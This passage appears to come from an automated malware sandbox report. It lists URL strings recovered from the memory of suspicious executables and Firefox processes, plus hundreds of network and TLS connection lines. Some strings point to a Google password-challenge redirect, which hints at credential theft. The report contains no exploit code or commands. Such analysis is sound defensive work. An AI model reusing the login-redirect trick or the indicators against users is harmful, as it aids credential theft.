Source: firefox.exe, 00000021.00000002.3075223949.00000273A3ADF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A08000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3032521057.000000940677C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/about/legal/terms/subscription-services/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/releasenotes/?utm_source=firefox-browser&utm_medi
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/%VERSION%/tour/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/geolocation/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/new?reason=manual-update
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/notes
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/xr/
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/privacy/subscription-services/
Source: file.exe, 00000000.00000002.2124461311.0000000000B04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: firefox.exe, 00000021.00000003.2915501190.00000273A8D14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2913626859.00000273A9133000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: file.exe, 00000000.00000002.2124461311.0000000000B04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: file.exe, 00000000.00000002.2124461311.0000000000BE7000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2124461311.0000000000B04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: file.exe, 00000000.00000002.2124461311.0000000000BE7000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: file.exe, 00000000.00000002.2124461311.0000000000B04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: file.exe, 00000000.00000003.2012687521.000000000B85C000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2715342011.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2833716406.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/android/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
Source: file.exe, 00000000.00000002.2124461311.0000000000B04000.00000040.00000001.01000000.00000003.sdmp, firefox.exe, 00000021.00000002.3063668397.00000273A3143000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3029399801.000001F80C0CB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D7CD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: firefox.exe, 00000021.00000002.3097416157.00000273A51CF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3106287804.00000273A6E52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-content
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000021.00000002.3094692666.00000273A4B00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000022.00000002.3045373727.000001F80C140000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 00000023.00000002.3024260771.000002264D5B0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
Source: firefox.exe, 00000021.00000003.2968690731.00000273AF67D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: file.exe, 00000000.00000003.2012687521.000000000B85C000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2715342011.0000000005F28000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000003.2833716406.0000000005D23000.00000004.00000800.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.2946390796.0000000005D29000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: file.exe, 00000000.00000002.2124461311.0000000000B04000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
Source: firefox.exe, 00000021.00000003.2970660238.00000273AB156000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3065387180.00000273A32A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/setupInstallLocations/locations
Source: firefox.exe, 00000021.00000002.3106287804.00000273A6E05000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3027481376.000002264D70A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3BDE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3A2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3075223949.00000273A3A12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warning
Source: firefox.exe, 00000021.00000002.3073895804.00000273A3800000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
Source: firefox.exe, 00000021.00000002.3075223949.00000273A3ADF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000021.00000003.2972005973.00000273AB112000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2968260213.00000273B1D33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000021.00000002.3050220597.000000947E5D8000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://account-
Source: firefox.exe, 00000021.00000002.3078069828.00000273A3B72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3052391502.00000273976A9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3052932070.0000027397811000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.2891656472.00000273AA086000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3024430303.000001F80BE6A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3024430303.000001F80BE60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3044920479.000001F80C134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3022918964.000002264D530000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3044594043.000002264D814000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3022918964.000002264D53A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 0000001F.00000002.2809653985.000001EBC38DA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000020.00000002.2823115767.0000020EA5B7F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3052391502.00000273976A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000021.00000002.3055190646.00000273991CB000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.3055190646.000002739919A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3024430303.000001F80BE60000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000022.00000002.3044920479.000001F80C134000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3022918964.000002264D530000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000023.00000002.3044594043.000002264D814000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000021.00000002.3052391502.00000273976A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdO
Source: f1628a2a52.exe, 00000013.00000002.2858538194.00000000018A0000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2838659401.0000000001898000.00000004.00000020.00020000.00000000.sdmp, f1628a2a52.exe, 00000013.00000003.2838910879.0000000001898000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdT
Source: firefox.exe, 00000021.00000002.3052932070.0000027397803000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdv

Source: unknown	Network traffic detected: HTTP traffic on port 50277 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50338
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50219
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50094 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49984 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50102 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 50219 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50108
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50107
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown	Network traffic detected: HTTP traffic on port 49946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50113 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50102
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50104
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50103
Source: unknown	Network traffic detected: HTTP traffic on port 50205 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50325 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50107 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50197 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50117
Source: unknown	Network traffic detected: HTTP traffic on port 50204 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50118
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49960
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50197
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50230
Source: unknown	Network traffic detected: HTTP traffic on port 49918 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50114 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50231
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50113
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50112
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50115
Source: unknown	Network traffic detected: HTTP traffic on port 50096 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50114
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49933 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49959
Source: unknown	Network traffic detected: HTTP traffic on port 50272 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49956
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49954
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50280 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50241
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 50207 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50002
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 50241 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50094
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50096
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50095
Source: unknown	Network traffic detected: HTTP traffic on port 49884 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49941 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49942
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49941
Source: unknown	Network traffic detected: HTTP traffic on port 49922 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50097
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50132
Source: unknown	Network traffic detected: HTTP traffic on port 50112 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50016
Source: unknown	Network traffic detected: HTTP traffic on port 50206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50338 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50324 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown	Network traffic detected: HTTP traffic on port 50230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 50117 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50278 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50152 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50209 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50095 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50201 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49960 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50272
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 50103 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49922
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49884
Source: unknown	Network traffic detected: HTTP traffic on port 50118 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50279 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50152
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50278
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50277
Source: unknown	Network traffic detected: HTTP traffic on port 50208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50279
Source: unknown	Network traffic detected: HTTP traffic on port 49877 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50280
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49956 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50162
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49918
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50104 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49877
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50205
Source: unknown	Network traffic detected: HTTP traffic on port 50203 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50325
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50207
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50206
Source: unknown	Network traffic detected: HTTP traffic on port 50016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50209
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50208
Source: unknown	Network traffic detected: HTTP traffic on port 50115 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50201
Source: unknown	Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50203
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50324
Source: unknown	Network traffic detected: HTTP traffic on port 50097 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 49959 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50002 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50132 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 50231 -> 443

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49864 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49877 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49889 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49899 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49908 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49918 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49928 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49933 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.4:49956 version: TLS 1.2
